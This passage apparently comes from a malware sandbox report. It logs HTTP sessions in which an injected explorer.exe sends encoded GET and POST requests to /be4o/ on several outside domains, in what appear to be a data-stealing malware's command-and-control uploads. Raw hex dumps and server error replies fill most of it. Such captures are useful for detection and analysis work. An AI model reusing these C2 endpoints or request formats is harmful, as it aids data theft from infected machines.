~5i_jbqFZg5n28YTo4yMXYf0ZuyfZUBkivOlwEQThYoLzUKktgDOthqxEAIgWgDJtCpiEey1IEIfYmCm1S6429570sV2QaKBLoIcAfIwGp9LMGOnysjfnm4zEnWehZATT4lo8uqlIOxLlgGEsb1yEPrwpAR-3_e1oqQmk9hPHrfQjrCTiIOfsd(ARRKuHosEcgGM9uXLhuRE1rt9rreBPueUIEnpZWCuTnEvDqrMsZf9ZWL1lj8XmV(hsZLk6F~XvYm4~IhG3_dR(Nu2(sy5HfkNA7Fi2AdDFwdVzGEiW1Vfbf7x3NTjyJ3Sh1tYPHGaH_CukfZHN-99ipy8x3~h7Mhbg_I879yYstt2CbW5e4CFmGfvPG8tHcpCUCgOaMwjhPy_GmNt4SBD9-SIYuUPQvZ_YyehaFi5s9GQ0xW3~_P3k1UxzwxGtyfhGcxToYGajWpu7F7NcMSoDQSxEsSsaSrmNwzF7bw8L6TQtU1vxnMXDV9NQ4qmu5Q0(b2dfi5l73Xqo_(2X0trb_Ivm0zwXNi3wSm0qiPKucHONdi9OyCieBCQ3R6mOxfdteSAh8qLssvg4M4dUH1EB7ydHt9qiTfNQVG7ciclUrCctfB3p6ly7XAhCEg7(j3A79eMp_5IUKhFq_x29HrE0Bw2e1LTl2cuJNz1WZfTanvSBdqq0Ih3yW0k~KajtI8yz03RGteghnYghUUIt5YWWj7184g6cPIRZazOmPamyuBiIiqjbRywtbl4nNS6L-CtvgOXhR2Yb1GuNVyCOC4lAJSE7ay3o97whs(3XO9drv(sKn0s0S
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.170196056 CET9503OUTData Raw: 64 61 45 57 62 55 38 57 77 38 54 6c 78 44 30 38 6f 2d 4d 6e 34 5f 70 53 41 58 6c 4d 6a 35 51 2d 52 78 7a 63 61 53 37 46 45 77 4e 65 56 58 45 69 52 72 71 37 48 78 47 53 61 41 32 6a 74 37 63 74 38 59 78 4f 62 57 49 61 52 69 47 52 4d 2d 31 6e 36 71
                                                                                                                                                                                                                              Data Ascii: daEWbU8Ww8TlxD08o-Mn4_pSAXlMj5Q-RxzcaS7FEwNeVXEiRrq7HxGSaA2jt7ct8YxObWIaRiGRM-1n6qy_d99dkk63qoNjP6D4o0OXTCkgJjEkZepgQHpnlBNypKFcaTaAWXPlo19BWyxYLwfpWxQRk4ThKRHzWJVc4oXEF0rh1TlkIxNQ4-DJtBofPcpxaheP9BNjeD9KZRK5bv~rp_(tPBqlzDeXmLUHSY~5qoFwejEhlUB
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.178558111 CET9506OUTData Raw: 38 39 39 5a 49 4c 31 54 67 51 58 51 36 78 61 35 47 6c 44 68 6f 6f 48 54 73 58 57 65 34 67 49 52 36 78 6a 74 59 4e 44 62 6c 43 47 5a 63 30 55 71 44 62 69 32 6d 47 4b 65 58 47 74 4a 48 71 7e 4e 64 59 64 41 35 33 28 71 51 6c 43 43 55 6b 7e 43 34 57
                                                                                                                                                                                                                              Data Ascii: 899ZIL1TgQXQ6xa5GlDhooHTsXWe4gIR6xjtYNDblCGZc0UqDbi2mGKeXGtJHq~NdYdA53(qQlCCUk~C4WKsWMx9lKQPnpj6CQJZYx6E4mEeulMInMXMmy8dv5F6wHfcmZt6D4mVO-~sm6~4HR0Yjcf6uUyyQMkE(I7UBA(x6nHnNZLRGLDzLe1qQrWWRvmhut3GLJua4vgCwGigBQ7rwOeMN1PXpjODkBvQQP1A1Z1GBRNR2yF
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.178626060 CET9507OUTData Raw: 6c 33 4a 6d 33 45 54 6f 41 69 47 45 63 31 32 77 6f 39 37 50 7a 4b 55 44 72 38 41 63 35 75 56 39 69 51 36 31 50 42 44 41 36 2d 33 39 34 5f 4c 59 5a 6b 67 4e 61 63 6f 59 31 76 48 56 45 44 74 63 75 51 4e 31 46 72 6b 37 58 62 6b 35 75 44 71 49 59 43
                                                                                                                                                                                                                              Data Ascii: l3Jm3EToAiGEc12wo97PzKUDr8Ac5uV9iQ61PBDA6-394_LYZkgNacoY1vHVEDtcuQN1Frk7Xbk5uDqIYCT6MSD2tD(a1derM9XZscfyAPWwwYBqZOpCjm79v6Xc4xV3o9IuYzrv1cbRWS5hlP7-XjgRKVO1RCRS22iRW9M4a4ggRp5u3tlmWK(Ty-dUF_jb4qrB9VPjNaH4IOk97z620FryMVeAtbXXAWUeW-B6~l4nSYfk7ar
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.178668976 CET9509OUTData Raw: 28 78 31 41 47 72 78 7a 42 37 62 63 52 71 58 66 74 4f 50 6b 52 73 66 2d 6b 70 28 67 45 63 52 39 56 62 45 47 67 72 43 77 52 70 71 5f 70 71 78 4a 49 6e 45 5f 5a 77 77 37 75 71 71 56 5a 67 6e 6e 4f 59 79 5f 51 77 51 43 6a 35 49 56 5a 4f 65 46 75 72
                                                                                                                                                                                                                              Data Ascii: (x1AGrxzB7bcRqXftOPkRsf-kp(gEcR9VbEGgrCwRpq_pqxJInE_Zww7uqqVZgnnOYy_QwQCj5IVZOeFur4OCGTRF5YwibyA4lS-8aTAG4r8bqEUEwqJf2pQ6ko7yhh_5VBb3YrJ5m82Wyph9nh7D_QChXYfqQXWkpwjhGhCebv0QBVz8-gn5zR7kIlmcjq5tTx8Ij8R3z0JHwDrUA08Av(1RCXJZ1xV15v04Z~WhVG_xmJorfN
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.180565119 CET9512OUTData Raw: 44 4d 52 5a 73 4b 6e 33 51 51 33 6c 52 39 47 4f 4c 43 47 4f 4e 5a 49 49 76 37 77 49 43 6c 78 68 67 52 6a 4f 58 31 79 31 30 53 45 41 62 6a 49 37 65 64 4a 46 64 57 74 67 4f 52 50 64 50 74 51 59 73 66 4c 43 71 6e 4d 74 75 5f 76 46 38 78 6e 75 30 4e
                                                                                                                                                                                                                              Data Ascii: DMRZsKn3QQ3lR9GOLCGONZIIv7wIClxhgRjOX1y10SEAbjI7edJFdWtgORPdPtQYsfLCqnMtu_vF8xnu0NVfCCUfHh2WhWQqfS7P7pgGdljgVl3Eo76anOY2XTGyJGkMzpCp4FwZBnmklLp05FVAvCoacJhYcoLjtJX6zQnS3cKN421og-TU724v8M1ak3pMInJrPeqUevSxcQBWwO26vpdM5IDG7csbleDY6xtiUTTemEVkd3c
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.180629015 CET9520OUTData Raw: 4f 4d 54 72 56 52 43 6c 6a 7a 68 47 41 64 6e 65 57 76 39 4a 66 62 35 59 38 57 48 64 31 65 28 71 4e 68 30 72 51 52 58 41 52 4c 58 36 31 6d 78 6c 56 44 4e 53 49 54 77 58 65 34 79 54 75 4b 31 58 5a 6d 64 50 39 68 54 50 75 79 30 53 56 50 48 76 41 46
                                                                                                                                                                                                                              Data Ascii: OMTrVRCljzhGAdneWv9Jfb5Y8WHd1e(qNh0rQRXARLX61mxlVDNSITwXe4yTuK1XZmdP9hTPuy0SVPHvAFiyinMheQYfHfEbkqZXDWk6XHK17oDUKEyY9oGVpRLwY7vw5a2iokfahXc_PhK1T1WNNkh6ILA9QQRLCgNNbQHgskwhf8eVDi0w3XARoaPhvHxHoN54VKQmaBXYNmnfhfeGFyTVXhK69RbUTAs3CZsu8zjQhVDGJHb
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.180864096 CET9526OUTData Raw: 52 75 32 47 78 33 53 57 59 63 47 58 43 6c 45 42 73 68 57 66 51 34 68 76 7e 42 6a 77 32 32 62 67 56 41 36 6a 74 30 7a 39 42 74 6c 44 70 74 43 4b 36 41 52 74 46 2d 30 39 74 43 64 6a 39 75 7a 6b 57 44 6c 69 64 32 7e 71 6b 6f 30 71 31 4e 39 41 39 39
                                                                                                                                                                                                                              Data Ascii: Ru2Gx3SWYcGXClEBshWfQ4hv~Bjw22bgVA6jt0z9BtlDptCK6ARtF-09tCdj9uzkWDlid2~qko0q1N9A99bqbTg6pjvjrmw4the8aftbb0jvbvJ1vyfHy2655F3QiAz4aUFLWBBfo0FLQzjMGeiRZtNlKUFIk4asVLyGD06wrbUdPuHvAdLRm2QPNadp4qgcmbSje2k73LgRrV3sAv6ZsVTLpNLgufBrwBXH3FNxRZCtIiqaO-J
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.181056976 CET9529OUTData Raw: 4c 45 36 71 79 42 73 52 6b 75 39 70 55 5f 6a 4e 62 79 4e 6c 55 30 4e 4f 61 55 7a 6a 31 6c 43 42 6d 4e 69 71 76 48 6f 57 49 7a 43 4b 53 70 68 46 36 39 33 4c 71 47 59 75 67 42 36 30 6c 4c 4f 71 79 34 44 4b 4f 4a 4b 46 72 43 36 51 4e 54 51 58 34 41
                                                                                                                                                                                                                              Data Ascii: LE6qyBsRku9pU_jNbyNlU0NOaUzj1lCBmNiqvHoWIzCKSphF693LqGYugB60lLOqy4DKOJKFrC6QNTQX4ARzCV3YKALrOT61Zq4vFXmNDZGgC4m7y6ItnYjmmG~rSjUZABE4TURGqJPf2MkbVG0LhiMwOxaofiF0~t9ofjU8538LErStSggXHqOZlR~XjU9P4BpFqN7I(Ecg7KDONNYnNmbIj-Ay837ekfWNrNEHDPA-NqYoVVZ
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.181211948 CET9531OUTData Raw: 79 6d 73 75 58 6f 76 63 61 79 61 6e 67 35 77 6e 6c 49 61 5f 4b 77 49 63 61 72 50 61 43 38 55 74 56 34 6e 46 31 44 53 46 77 54 64 5f 4e 49 75 4a 44 47 45 77 48 61 68 61 75 30 7a 53 6d 78 41 6d 52 65 6d 69 42 61 75 44 28 4b 38 7a 7e 50 4c 77 37 6c
                                                                                                                                                                                                                              Data Ascii: ymsuXovcayang5wnlIa_KwIcarPaC8UtV4nF1DSFwTd_NIuJDGEwHahau0zSmxAmRemiBauD(K8z~PLw7lpVkA5XEYujVLALSPVaA5CwtKg_Y3Yqi6U29wLb4TQVRzW0SABoz2n3WMGHVjZ4551hranEqte1GCq6V0Q-hgcuw8L061wMOfgnHFXQAPNRHjUFT3Irzfp_L1P5rYlCFjuo33KZN0FwtatT2I2u(x2XpCihBq33cIi
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.188828945 CET9537OUTData Raw: 79 75 45 44 72 57 64 33 42 38 4c 36 72 4d 45 44 57 34 4f 47 32 6e 53 5a 57 76 67 33 50 48 51 5f 39 58 33 72 49 73 6e 69 74 75 66 38 38 59 41 50 68 6a 59 7a 34 31 59 53 33 46 78 6f 50 44 46 6a 28 77 51 2d 4c 55 52 46 63 44 48 68 69 32 54 57 65 71
                                                                                                                                                                                                                              Data Ascii: yuEDrWd3B8L6rMEDW4OG2nSZWvg3PHQ_9X3rIsnituf88YAPhjYz41YS3FxoPDFj(wQ-LURFcDHhi2TWeqttXK3VStu9TM6ZB-PQSPM8hgE09l2C0yjZzBedSMIuGh2FiIfRvKzpAvqCHYMpZp97PT(VoNWTmLwHDS~Iz0UuPFpe(mG3d72NqWHAowC5GsWTzm7o4-AiHEfTt-8Ly0qCVJj_vT83m2fpSwnHlak-PbJDqtW4bG5
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.278912067 CET9669INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:22 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_CpLPvD4XQuVnha6rO1wNCX6rSp91UJvoNJN0meDWFFo5JM5s7CpzF76GDsyLNNL0W4YULbTU4G/1WiDDezugCQ
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              27192.168.11.204981334.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.181205988 CET9529OUTGET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.josiemaran-supernatural.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:54:22.287843943 CET9669INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:22 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 275
                                                                                                                                                                                                                              ETag: "61ffb800-113"
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              28192.168.11.204981445.195.115.7180C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:54:27.471216917 CET9674OUTPOST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.rsxrsh.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.rsxrsh.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.rsxrsh.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Data Raw: 68 34 38 48 6c 3d 63 72 64 47 56 68 78 6b 35 75 7a 66 64 76 69 70 69 58 42 5f 6d 34 6b 41 6b 58 42 48 75 54 37 34 33 58 77 48 4a 33 74 54 6c 35 28 70 67 57 34 52 4a 4f 7e 63 6a 62 6f 4b 7e 61 6c 59 7e 5f 6c 69 64 4d 35 56 7e 74 34 66 65 53 6e 68 32 34 52 4a 52 34 7e 6c 50 4d 42 66 6d 56 32 4c 62 33 39 34 51 6a 7a 4d 78 77 46 63 73 73 32 54 75 70 68 50 5a 64 32 69 55 79 30 75 55 70 47 43 7a 36 74 61 57 73 47 42 34 76 5a 78 33 68 49 39 31 51 5a 44 44 34 6a 7a 33 34 58 65 52 51 63 39 58 4a 56 64 41 70 6c 54 41 6f 4d 34 73 46 6a 77 5a 5a 6b 33 46 39 70 79 43 63 47 79 72 69 69 6c 54 43 73 4d 6e 7a 28 76 30 2d 59 46 53 33 72 38 44 48 49 47 69 48 33 79 72 59 31 59 6b 48 74 4a 43 46 4f 62 51 48 7e 70 72 7a 69 47 6d 44 34 6c 73 58 61 52 32 55 58 50 6a 50 77 49 66 79 6c 61 73 51 4b 58 33 79 6f 35 50 57 63 35 63 31 58 5a 36 43 67 55 46 37 34 30 6c 4d 34 6e 65 4d 6b 4b 58 54 4e 55 59 6b 72 4f 62 46 6b 49 30 68 79 58 6f 48 28 30 45 53 36 4a 74 30 59 58 5a 62 48 6d 79 41 39 6c 6f 4e 6f 6b 7a 59 77 44 6e 4f 47 44 43 4c 51 70 59 63 78 31 69 72 33 4a 68 7a 75 6f 58 74 55 36 70 39 35 49 75 62 38 34 37 6e 43 6f 76 31 67 4a 77 37 64 39 79 57 34 69 69 4a 71 77 55 5a 30 50 30 54 6b 68 51 48 4f 47 50 55 62 61 79 53 67 79 59 33 43 65 54 48 6f 2d 73 64 67 53 65 4c 30 51 4e 55 31 4c 35 39 4c 36 74 71 7a 72 48 35 32 58 36 68 56 44 77 4c 55 34 77 38 75 6c 51 48 46 77 7a 49 6f 6e 6b 35 35 78 52 63 41 30 56 45 5a 52 48 64 4b 4d 48 48 7a 49 65 34 42 47 4f 79 37 51 6f 45 66 5f 39 52 30 4a 46 56 46 36 71 4e 55 39 38 2d 64 62 6a 43 4f 37 69 52 63 75 59 7a 34 6e 61 34 70 66 75 67 53 4a 54 42 58 6a 31 57 6f 38 7e 45 4f 4f 57 4b 54 55 44 5f 6d 59 4a 67 28 51 52 37 68 32 4f 45 63 62 70 6f 4c 54 55 53 61 46 76 5a 43 66 36 7a 33 78 55 43 77 69 28 2d 6b 62 62 51 41 5f 44 48 35 43 42 77 70 31 76 76 61 78 71 52 56 57 4b 59 57 51 4b 61 74 51 62 74 6f 75 44 59 4d 57 37 44 45 53 56 4f 70 4e 4a 78 6b 48 44 64 7a 69 76 37 52 6d 4d 4d 30 4a 78 36 56 50 4e 4d 76 6b 73 53 6d 6f 5a 63 5a 74 76 34 71 62 54 32 61 71 46 75 31 74 36 77 61 4f 53 59 78 75 4b 5f 38 76 34 46 59 61 75 5f 37 42 75 72 41 4f 68 6f 77 5a 71 6b 53 7a 76 55 36 59 42 2d 32 30 58 61 74 56 38 43 53 36 43 46 44 68 53 33 6c 77 6c 7a 74 70 51 6e 46 66 4b 55 28 54 61 48 78 4d 35 52 69 6b 79 4a 66 78 72 35 35 6a 30 64 4c 31 64 36 30 5f 6b 49 63 32 51 31 71 45 6a 52 32 57 38 6a 72 79 65 31 4b 35 6e 38 46 6c 76 46 30 79 50 5a 34 4c 58 2d 6d 70 38 6f 65 68 35 63 32 70 6f 70 45 41 36 44 73 59 55 50 4c 53 4b 4d 50 41 4a 76 67 46 72 78 28 65 46 37 42 6c 4b 73 7e 52 55 4a 6f 78 46 32 39 2d 73 7a 63 61 62 31 56 4c 4c 4b 4a 76 7a 6f 70 39 32 31 58 75 6e 41 56 57 69 7a 56 56 44 71 37 45 44 32 68 47 4a 46 35 46 54 6b 66 69 65 5f 4d 4d 4b 32 70 70 51 6d 65 36 4a 67 73 49 65 6c 6b 5a 53 70 72 63 63 36 41 32 66 51 6a 70 43 34 70 32 74 78 7e 79 28 6c 37 42 4e 47 32 68 71 48 6d 31 4a 4b 54 2d 46 51 46 69 38 58 78 6b 52 69 4a 4e 49 4b 36 50 7e 65 36 4d 52 77 51 44 66 2d 46 57 72 7a 51 6a 58 58 4e 4c 35 75 75 71 45 70 4c 79 41 52 65 54 58 66 56 38 28 79 77 32 39 6c 55 72 58 35 41 31 68 65 41 2d 79 56 6c 7a 65 6e 35 51 4e 44 74 73 62 56 48 66 67 63 4a 61 77 36 71 41 54 6a 7a 49 42 48 28 4d 4f 58 62 6a 53 6f 4b 62 48 62 35 79 4b 7a 33 41 37 77 54 5f 68 5a 55 72 41 38 71 71 39 51 57 41 33 31 61 71 50 57 50 6b 58 35 76 66 28 73 78 6c 73 65 75 51 37 35 78 76 4d 4b 4f 6d 48 64 6a 6d 45 46 51 45 36 41 61 46 45 65 43 49 5a 65 4f 36 76 39 75 6c 61 71 28 53 72 58 50 72 77 4f 70 52 36 5a 6e 62 4c 50 44 39 6c 63 55 64 47 6c 56 4a 4b 7a 58 2d 61 55 79 36 65 53 31 38 77 50 43 4e 77 38 4f 67 72 33 5a 54 6f 63 50 59 52 31 50 4d 73 31 30 54 56 38 28 57 36 63 4d 6b 62 78 6e 6a 54 37 44 66 71 4a 58 7a 37 78 75 42 46 7a 74 6c 42 35 32 6b 36 6b 48 6c 76 58 66 50 58 65 7a 36 66 31 33 56 79 46 64 58 50 52 59 49 5a 77 78 64 36 65 56 72 62 66 41 58 54 58 28 54 50 6e 76 62 44 61 45 37 39 31 72 52 6d 54 35 68 41 6f 5a 54 50 43 37 69 6c 4d 41 63 51 47 4b 61 61 6e 6f 59 4a 38 78 32 76 71 42 39 67 7a 66 59 51 70 46 45 35 6c 37 6c 6f 67 61 4f 74 54 32 72 55 6e 44 42 55 42 58 39 4e 35 48 41 75 5a 38 33 61 74 58 37 57 4f 58 55 42 58 79 2d 47 49 73 51 69
                                                                                                                                                                                                                              Data Ascii: h48Hl=crdGVhxk5uzfdvipiXB_m4kAkXBHuT743XwHJ3tTl5(pgW4RJO~cjboK~alY~_lidM5V~t4feSnh24RJR4~lPMBfmV2Lb394QjzMxwFcss2TuphPZd2iUy0uUpGCz6taWsGB4vZx3hI91QZDD4jz34XeRQc9XJVdAplTAoM4sFjwZZk3F9pyCcGyriilTCsMnz(v0-YFS3r8DHIGiH3yrY1YkHtJCFObQH~prziGmD4lsXaR2UXPjPwIfylasQKX3yo5PWc5c1XZ6CgUF740lM4neMkKXTNUYkrObFkI0hyXoH(0ES6Jt0YXZbHmyA9loNokzYwDnOGDCLQpYcx1ir3JhzuoXtU6p95Iub847nCov1gJw7d9yW4iiJqwUZ0P0TkhQHOGPUbaySgyY3CeTHo-sdgSeL0QNU1L59L6tqzrH52X6hVDwLU4w8ulQHFwzIonk55xRcA0VEZRHdKMHHzIe4BGOy7QoEf_9R0JFVF6qNU98-dbjCO7iRcuYz4na4pfugSJTBXj1Wo8~EOOWKTUD_mYJg(QR7h2OEcbpoLTUSaFvZCf6z3xUCwi(-kbbQA_DH5CBwp1vvaxqRVWKYWQKatQbtouDYMW7DESVOpNJxkHDdziv7RmMM0Jx6VPNMvksSmoZcZtv4qbT2aqFu1t6waOSYxuK_8v4FYau_7BurAOhowZqkSzvU6YB-20XatV8CS6CFDhS3lwlztpQnFfKU(TaHxM5RikyJfxr55j0dL1d60_kIc2Q1qEjR2W8jrye1K5n8FlvF0yPZ4LX-mp8oeh5c2popEA6DsYUPLSKMPAJvgFrx(eF7BlKs~RUJoxF29-szcab1VLLKJvzop921XunAVWizVVDq7ED2hGJF5FTkfie_MMK2ppQme6JgsIelkZSprcc6A2fQjpC4p2tx~y(l7BNG2hqHm1JKT-FQFi8XxkRiJNIK6P~e6MRwQDf-FWrzQjXXNL5uuqEpLyAReTXfV8(yw29lUrX5A1heA-yVlzen5QNDtsbVHfgcJaw6qATjzIBH(MOXbjSoKbHb5yKz3A7wT_hZUrA8qq9QWA31aqPWPkX5vf(sxlseuQ75xvMKOmHdjmEFQE6AaFEeCIZeO6v9ulaq(SrXPrwOpR6ZnbLPD9lcUdGlVJKzX-aUy6eS18wPCNw8Ogr3ZTocPYR1PMs10TV8(W6cMkbxnjT7DfqJXz7xuBFztlB52k6kHlvXfPXez6f13VyFdXPRYIZwxd6eVrbfAXTX(TPnvbDaE791rRmT5hAoZTPC7ilMAcQGKaanoYJ8x2vqB9gzfYQpFE5l7logaOtT2rUnDBUBX9N5HAuZ83atX7WOXUBXy-GIsQiehio9i6H3NjTjJ1R91NLcIXfIzIHMpnImMOhQpP2wRbUA6lfO5-TBZq4oRG870qktOyq8ai1A5M8s(fTKr8TAN1ENI_BlbQHKVr0meYO4zyC9nF0huCFAK79s6KZ5elTb2jW3eULLLgqij6ckEdB3jdi6g6f0Oqf9vS3Q2t2HVJAGf6JsFTux0P7KWijGwZNbjp~P22zrb39-SwKtYXSOQJv5B2RwYAV_WGIwUch7Y8HuPFk59UaEXpKq1woF0am2I4BaUQFkPKk9lSLdtg0AhcBd2IVG4FTo6d0lOMqlM85FuVyeBukSiIVbgekKbwA9pEo94Gkvmdq3R3vZfgaDYgD0Ba6qMuE9TiNyq3Z6AUKw3eV9thovZAHnmjAHC2FeQc6XvULwXRcGEkZ_jcngLnT1VNgihAZ2yMq-qkEQUOUi62u1seakRbagFhxTI-plS-0Goy8oQgUgOedLw856A2HH0n6dp_wkOtDEP0Vm1vJj1CpIShwliqHXat9L0CAN63ZgACYhBsvVBKUU2UK-ajbY2b1rQugMn-p5C3hW1me1nH(I2_cljVX3ah0WwdXMHseRuD355Nq7A6UpaYxaO2GaWMJxDrFKuuRCIgzFDRHYOkgeFYN77IUay2gRDAwBrtIAf1QG4ax1ZAH2rfzyMMW1W3IBYnhUWVhWPfygTLi23iE5LZqEcKPctBWVG2UBgaAT(y8s(jvLXCeEzXqS7LLOxmWQM4ToYVsjQ-g3Rm5nWf7zFuEinktHVgpKdTCxVoP_5TIG5YxWnda8aN(cCPgDTXMXcLkAgXm97OtS4BRAhc7zNX7YrLwb6BjkP95Clt4KUhTpnKwTa_jfQeQXppRGmQPVoI5TDA8UX2cj0i4LPVWcCBdVbrKJYiBDTFQS~ZlSdgodWWQa5u~jJ-KOTqtfHCvY1blDcwUrSyBiw7MwHeuX86BCqSE3TB4HPoCgf4rwPG09xOIoeQgx6brG9Pr0mo8TL0TgIY70dzYbtFTBKWxcVJg_mYRC9w80toIYFbWdtwGP0CCuhwVDoltzvUQRXsOzN5Wq29MJ0v64c8f6SrA2x0ro4A6FjsUH~_J-vdL91CERIOZlU2m-1HhD1J48TDLvm24mq5~zFlOIfad7S5laHgDOUJvHxym_HP6LxphndFgkx8YqWDGnXvn8ju(J9HKAOruaXhvqRxYmUA5I(abTGLTUfJQK2cLQ(rwai4b_paOIJHz7pF(rj6m7GUq6kNTPh67RBsDYe6v4nL2SEoQEkJURt-27nCQkXvgVWmvedUoWJrYny24MycTgT0BRssaHesA1N7WxB6wov5PSmQ3SXZCcLuujFbQ5xshAi2BL(2zUbCBssOPbZQwOcpPe98cA86Ur9CUWNgI10DL2dEPdw_y7LVmZqOBiThwJsNKoVwzznKlLneHbL9O8c_GtyBFaDlIpLyspUjBJvimKlKSlDNKFDNqZEOAn~Mu51hLh0yVipQvPhcvzYqtTq4Y-(ue1JXvMsyiuAMnmPpaDimXN~diOYnPA(5KMtDdtmpLfqgMY(3~Fl8O-kXdi9nhxSdKjS1L7sIxUQuPoFIeVOzEvGvAtcb1R6OSNYkkpWDpNvKTVLWHpl5F-VaiaANmPO9FUMzgC6Su4H2J3q3JMG4Uep9IqY_TgtqU0OCU8yVxAlFZlRZVw9HsAZ6W9wEAyfWBTld~3u553reEOyrtFHAr-~L0n7OwAHMcuCU~xMKs37oqQlJTVQloV1EbOI0sSfBKOcygwjFfvYMS3lSsrKUZOhx88Hl5ZXcyy0wvl~pkCxGG2n-buncIWGL~kYj3C0iHY9mdF7VVnmXV74nPC7K8Ny9XLAOSOyDf34dUkRLhVZfqndmvZMUmDTmGOKY3Jo4hkXfC6iwriPlbDYB085lBgmvuNUVkDfmmH9LiqCG3wnCHEB6LDh5oIDKDDhismg5ktWIPXQT01nf(zo7uUU4SuUbZQqk7sCrPOlcgmmQ1Vn7GSiY0Qdd7QFnnuixv4VBI8w7ToS2K30QiC9p3mavDBrs6pXMTp0i8KBmltkeQOdPZl(t7kjUJvNq5AhrLUS3bm2iR7LALhGSBmEkLn1lzHvTYF2K6gQ983QDnCMMca2QjiEEs3vOhsyMYKKAsnkZ~7HEVrl_8X(RtzOstMSbMVdob26SoFYdPOPMATFsORgubGO8AXPgF0ZCo52tcyFGnwkLNXBZPvhiU2bv0Zv4P9FheMmsu-vdf3ssLi664FAxGtFyuwOBM_EZo6Q
